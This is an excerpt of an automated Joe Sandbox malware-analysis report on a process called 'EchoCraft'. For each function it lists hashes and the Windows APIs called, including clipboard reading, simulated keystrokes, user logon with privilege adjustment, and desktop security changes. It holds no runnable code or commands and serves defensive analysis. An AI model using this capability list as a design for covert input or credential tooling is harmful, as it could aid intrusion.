Function 00A83B82 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A83BDE

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 34f5a8a5929204b8585cc599b51190e9768bd801ecdbe52c3f9498adb0846d97
Instruction ID: 5a88f4176923a5541eaaa9fef135154ed722764a30a64b64c3dfdbaa3104efcc
Opcode Fuzzy Hash: 34f5a8a5929204b8585cc599b51190e9768bd801ecdbe52c3f9498adb0846d97
Instruction Fuzzy Hash: B7F0A070A043589FEB529B24DC4A7E67BBCAB02708F0400E9A28897282DB744B88CF45

Function 00A832E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A832FF

Part of subcall function 00A8B0DB: _wcslen.LIBCMT ref: 00A8B0EE

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 6bff60be2875d60b80c6d16d0098f051fee3b6d88a1b24da07c9576d761bd784
Instruction ID: d9310f8ebc99b0b62f1faf7348a08eac60255e6d16e94611fb10f67c814cdd6e
Opcode Fuzzy Hash: 6bff60be2875d60b80c6d16d0098f051fee3b6d88a1b24da07c9576d761bd784
Instruction Fuzzy Hash: 6FE08C72A002245BCB20A6689C06FEA77ADDB88790F0541B5BC09D7248DA64AD8086A0

Function 00AEE6F0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00AEE709

Part of subcall function 00A8B0DB: _wcslen.LIBCMT ref: 00A8B0EE

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: FolderPath_wcslen
String ID:
API String ID: 2987691875-0
Opcode ID: fb06a846707f58ceaf354517095bc324d7023f0ef42f64a103845fad8546524a
Instruction ID: b9c24daa512fbb0d25197cda9224185c26f72a51c37bbb197df1ffbb3489ed60
Opcode Fuzzy Hash: fb06a846707f58ceaf354517095bc324d7023f0ef42f64a103845fad8546524a
Instruction Fuzzy Hash: 2BD05EA19002282BDF60A6749D0DDF73AACCB40210F4006A0786DD3182E930ED4586B0

Function 00AF1188 Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_0007116E,00000000,00000000,?), ref: 00AF11A3

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: a77943c527d881fd4f74fb0673258d8ea0f7f79995aa5e930ffb48df31b46da9
Instruction ID: d2ef2f855bbebba13d27b923028be2371a82affcdb677e72b35e06a867366cc3
Opcode Fuzzy Hash: a77943c527d881fd4f74fb0673258d8ea0f7f79995aa5e930ffb48df31b46da9
Instruction Fuzzy Hash: D5D05EB1520318BFAB2CCBA0DD0ACB77A9CF901210380072EBA0292540F7F0FD0086A4

Function 00AC07BB Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00AC0B25,?,?,00000000,?,00AC0B25,00000000,0000000C), ref: 00AC07D8

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6327228a1dae41acc922d6d8f992893aa2350e8b7b57eb1d19c77c6501107ee0
Instruction ID: 46ce9c860cb52654c3797f67e7685895dd01969b5deadeff0086c53c97a3b443
Opcode Fuzzy Hash: 6327228a1dae41acc922d6d8f992893aa2350e8b7b57eb1d19c77c6501107ee0
Instruction Fuzzy Hash: FFD06C3204010DBBDF028F84DD06EDA3BAAFB48714F018000BE18A6020C732E831AB90

Non-executed Functions

Function 00B19B7E Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00A823E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A823F2

DefDlgProcW.USER32(?,0000004E,?,?,?,?), ref: 00B19C22
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B19C63
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B19CA7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B19CD1
SendMessageW.USER32 ref: 00B19CFA
GetKeyState.USER32(00000011), ref: 00B19D93
GetKeyState.USER32(00000009), ref: 00B19DA0
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B19DB6
GetKeyState.USER32(00000010), ref: 00B19DC0
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B19DF1
SendMessageW.USER32 ref: 00B19E18
SendMessageW.USER32(?,00001030,?,Function_0009849D), ref: 00B19F20
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?), ref: 00B19F36
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B19F49
SetCapture.USER32(?), ref: 00B19F52
ClientToScreen.USER32(?,?), ref: 00B19FB7
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B19FC4
InvalidateRect.USER32(?,00000000,00000001,?), ref: 00B19FDE
ReleaseCapture.USER32 ref: 00B19FE9
GetCursorPos.USER32(?), ref: 00B1A021
ScreenToClient.USER32(?,?), ref: 00B1A02E
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B1A088
SendMessageW.USER32 ref: 00B1A0B6
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B1A0F3
SendMessageW.USER32 ref: 00B1A122
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B1A143
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B1A152
GetCursorPos.USER32(?), ref: 00B1A170
ScreenToClient.USER32(?,?), ref: 00B1A17D
GetParent.USER32(?), ref: 00B1A19B
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B1A202
SendMessageW.USER32 ref: 00B1A233
ClientToScreen.USER32(?,?), ref: 00B1A28C
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B1A2BC
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B1A2E6
SendMessageW.USER32 ref: 00B1A309
ClientToScreen.USER32(?,?), ref: 00B1A356
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B1A38A

Part of subcall function 00A82184: GetWindowLongW.USER32(?,000000EB), ref: 00A82192

GetWindowLongW.USER32(?,000000F0), ref: 00B1A40D

Strings

F, xrefs: 00B1A30F
@GUI_DRAGID, xrefs: 00B19F85

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: e7ef601e0631bd0191da6def109bd9c946c845ce159f9c9b3e081753cc89532c
Instruction ID: d47575798177c282100bfa450fe0295af50a8ed30a311b72d9d0b7fb54377266
Opcode Fuzzy Hash: e7ef601e0631bd0191da6def109bd9c946c845ce159f9c9b3e081753cc89532c
Instruction Fuzzy Hash: 8342BD30205340EFDB25CF24D894BEABBE5FF49314F9446A9F595872A1DB31E890CB92

Function 00A9FC88 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00A9FC92
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00ADFAE3
IsIconic.USER32(00000000), ref: 00ADFAEC
ShowWindow.USER32(00000000,00000009), ref: 00ADFAF9
SetForegroundWindow.USER32(00000000), ref: 00ADFB03
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ADFB19
GetCurrentThreadId.KERNEL32 ref: 00ADFB20
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ADFB2C
AttachThreadInput.USER32(?,00000000,00000001), ref: 00ADFB3D
AttachThreadInput.USER32(?,00000000,00000001), ref: 00ADFB45
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00ADFB4D
SetForegroundWindow.USER32(00000000), ref: 00ADFB50
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADFB65
keybd_event.USER32(00000012,00000000), ref: 00ADFB70
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADFB7A
keybd_event.USER32(00000012,00000000), ref: 00ADFB7F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADFB88
keybd_event.USER32(00000012,00000000), ref: 00ADFB8D
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADFB97
keybd_event.USER32(00000012,00000000), ref: 00ADFB9C
SetForegroundWindow.USER32(00000000), ref: 00ADFB9F
AttachThreadInput.USER32(?,000000FF,00000000), ref: 00ADFBC6

Strings

Shell_TrayWnd, xrefs: 00ADFADE

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: fc2f467c6e23dfc21ba0b352b08e3fa6afb376ab22c1f00e7382b81a34ad9b7d
Instruction ID: 76bc7d42df296c14c80500844cc6fbc7bc15e2205d93f1a11ad536f6ad2feab7
Opcode Fuzzy Hash: fc2f467c6e23dfc21ba0b352b08e3fa6afb376ab22c1f00e7382b81a34ad9b7d
Instruction Fuzzy Hash: 19316871B402187FEB216BA59C49FBF7E7DEB44B50F504066FA06E71D1DAB05D00AAA0

Function 00AE1A7B Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00AE1F3D: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AE1F87
Part of subcall function 00AE1F3D: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AE1FB4
Part of subcall function 00AE1F3D: GetLastError.KERNEL32 ref: 00AE1FC4

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00AE1B00
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00AE1B22
CloseHandle.KERNEL32(?), ref: 00AE1B33
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AE1B4B
GetProcessWindowStation.USER32 ref: 00AE1B64
SetProcessWindowStation.USER32(00000000), ref: 00AE1B6E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AE1B8A

Part of subcall function 00AE1939: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AE1A76), ref: 00AE194E
Part of subcall function 00AE1939: CloseHandle.KERNEL32(?,?,00AE1A76), ref: 00AE1963

Strings

winsta0, xrefs: 00AE1B46
, xrefs: 00AE1AD4
default, xrefs: 00AE1B85

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 4bab84d4da83477abc0ee82d9c82dc1d78e13e997f9e8a3a3aa02e31e24f52fe
Instruction ID: c328edffa8982e3f5128e532a28eed4960c911609ef49b7b0b8f6efe3ad0793f
Opcode Fuzzy Hash: 4bab84d4da83477abc0ee82d9c82dc1d78e13e997f9e8a3a3aa02e31e24f52fe
Instruction Fuzzy Hash: 0281AA71900298AFDF119FA5DD49FEE7BB8EF48300F248129F901E62A0DB318E55CB61

Function 00AE13DC Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE1973: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AE198E
Part of subcall function 00AE1973: GetLastError.KERNEL32(?,00000000,00000000,?,?,00AE1415,?,?,?), ref: 00AE199A
Part of subcall function 00AE1973: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AE1415,?,?,?), ref: 00AE19A9
Part of subcall function 00AE1973: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AE1415,?,?,?), ref: 00AE19B0
Part of subcall function 00AE1973: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AE19C7

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AE1446
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AE147A
GetLengthSid.ADVAPI32(?), ref: 00AE1491
GetAce.ADVAPI32(?,00000000,?), ref: 00AE14CB
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AE14E7
GetLengthSid.ADVAPI32(?), ref: 00AE14FE
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00AE1506
HeapAlloc.KERNEL32(00000000), ref: 00AE150D
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AE152E
CopySid.ADVAPI32(00000000), ref: 00AE1535
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AE1564
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AE1586
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AE1598
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AE15BF
HeapFree.KERNEL32(00000000), ref: 00AE15C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AE15CF
HeapFree.KERNEL32(00000000), ref: 00AE15D6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AE15DF
HeapFree.KERNEL32(00000000), ref: 00AE15E6
GetProcessHeap.KERNEL32(00000000,?), ref: 00AE15F2
HeapFree.KERNEL32(00000000), ref: 00AE15F9

Part of subcall function 00AE1A0D: GetProcessHeap.KERNEL32(00000008,00AE142B,?,00000000,?,00AE142B,?), ref: 00AE1A1B
Part of subcall function 00AE1A0D: HeapAlloc.KERNEL32(00000000,?,00000000,?,00AE142B,?), ref: 00AE1A22
Part of subcall function 00AE1A0D: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00AE142B,?), ref: 00AE1A31

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 1b58db66997481b79fe33fe657c8b7d0cf79570dc152c15341712daba1fdf5c6
Instruction ID: dbfb7f0696782a4e37db7e7e6e0915f2c5a9f6caef122e52ffd44b079cece36d
Opcode Fuzzy Hash: 1b58db66997481b79fe33fe657c8b7d0cf79570dc152c15341712daba1fdf5c6
Instruction Fuzzy Hash: 0A714EB1900259AFDF10DFA6DC48FEEBBB8BF48350F148115E916A7291DB319A05CBB0

Function 00AFF345 Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00B1DBF4), ref: 00AFF36F
IsClipboardFormatAvailable.USER32(0000000D), ref: 00AFF37D
GetClipboardData.USER32(0000000D), ref: 00AFF389
CloseClipboard.USER32 ref: 00AFF395
GlobalLock.KERNEL32(00000000), ref: 00AFF3CD
CloseClipboard.USER32 ref: 00AFF3D7
GlobalUnlock.KERNEL32(00000000), ref: 00AFF402
IsClipboardFormatAvailable.USER32(00000001), ref: 00AFF40F
GetClipboardData.USER32(00000001), ref: 00AFF417
GlobalLock.KERNEL32(00000000), ref: 00AFF428
GlobalUnlock.KERNEL32(00000000), ref: 00AFF468
IsClipboardFormatAvailable.USER32(0000000F), ref: 00AFF47E
GetClipboardData.USER32(0000000F), ref: 00AFF48A
GlobalLock.KERNEL32(00000000), ref: 00AFF49B
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00AFF4BD
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00AFF4DA
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00AFF518
GlobalUnlock.KERNEL32(00000000), ref: 00AFF539
CountClipboardFormats.USER32 ref: 00AFF55A
CloseClipboard.USER32 ref: 00AFF59F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 38ab886b77eb32c8f9a7cf021af43ddb81218b511ff3af99766b57cc649f8c1a
Instruction ID: 890881c652fd9e6701bf5eeee0d0a0ab42cdcb2e740a6d5b5be4618e5e722104
Opcode Fuzzy Hash: 38ab886b77eb32c8f9a7cf021af43ddb81218b511ff3af99766b57cc649f8c1a
Instruction Fuzzy Hash: 4661AE312043059FD310EF64D888F7A77A4AF88704F54856DFA968B2A2DF71ED45CB62

Function 00AF4635 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AF4657
_wcslen.LIBCMT ref: 00AF4684
CreateDirectoryW.KERNEL32(?,00000000), ref: 00AF46B4
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00AF46D5
RemoveDirectoryW.KERNEL32(?), ref: 00AF46E5
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00AF476C
CloseHandle.KERNEL32(00000000), ref: 00AF4777
CloseHandle.KERNEL32(00000000), ref: 00AF4782

Strings

\, xrefs: 00AF468E
:, xrefs: 00AF4699
\??\%s, xrefs: 00AF4672

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: d5c2f5f9aa73ab3228858eb456e1e8377c053e8bc25b8dfb3007a3408a8c970d
Instruction ID: 137c09d92e12c60060a787e48c552a4dcd6616cd2446c962ed949bd6179fc423
Opcode Fuzzy Hash: d5c2f5f9aa73ab3228858eb456e1e8377c053e8bc25b8dfb3007a3408a8c970d
Instruction Fuzzy Hash: 6A31B07590021AABDB219BA0DC49FFB77BDEF89700F5041A5F619D70A0EB7497448B24

Function 00B0C5C4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0D11B: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0BE2E,?,?), ref: 00B0D138
Part of subcall function 00B0D11B: _wcslen.LIBCMT ref: 00B0D174
Part of subcall function 00B0D11B: _wcslen.LIBCMT ref: 00B0D1E2
Part of subcall function 00B0D11B: _wcslen.LIBCMT ref: 00B0D218

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0C6BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00B0C729
RegCloseKey.ADVAPI32(00000000), ref: 00B0C74D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B0C7AC
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B0C867
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B0C8D4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B0C969
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00B0C9BA
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B0CA63
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B0CB02
RegCloseKey.ADVAPI32(00000000), ref: 00B0CB0F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 5d4f966a5c0843e9bf87ae902aae27f469d1ff010079513a1a7f67d10bd76e57
Instruction ID: 85e01eb3b1a755185c60b21cdac75c9da40d5a54d371194351c61e95f72e4e9b
Opcode Fuzzy Hash: 5d4f966a5c0843e9bf87ae902aae27f469d1ff010079513a1a7f67d10bd76e57
Instruction Fuzzy Hash: 38026C71604200AFC715DF28C995E2ABBE5EF49314F18C59DF84ACB2A2DB31ED46CB51

Function 00AF72A6 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 286timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00AF72D2
FindClose.KERNEL32(00000000), ref: 00AF7323
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AF734F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AF7366

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

FileTimeToSystemTime.KERNEL32(?,?), ref: 00AF738D

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00AF73D3
%4d, xrefs: 00AF7413
%02d, xrefs: 00AF7461, 00AF746B, 00AF74B9, 00AF7508, 00AF7557, 00AF75A6

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
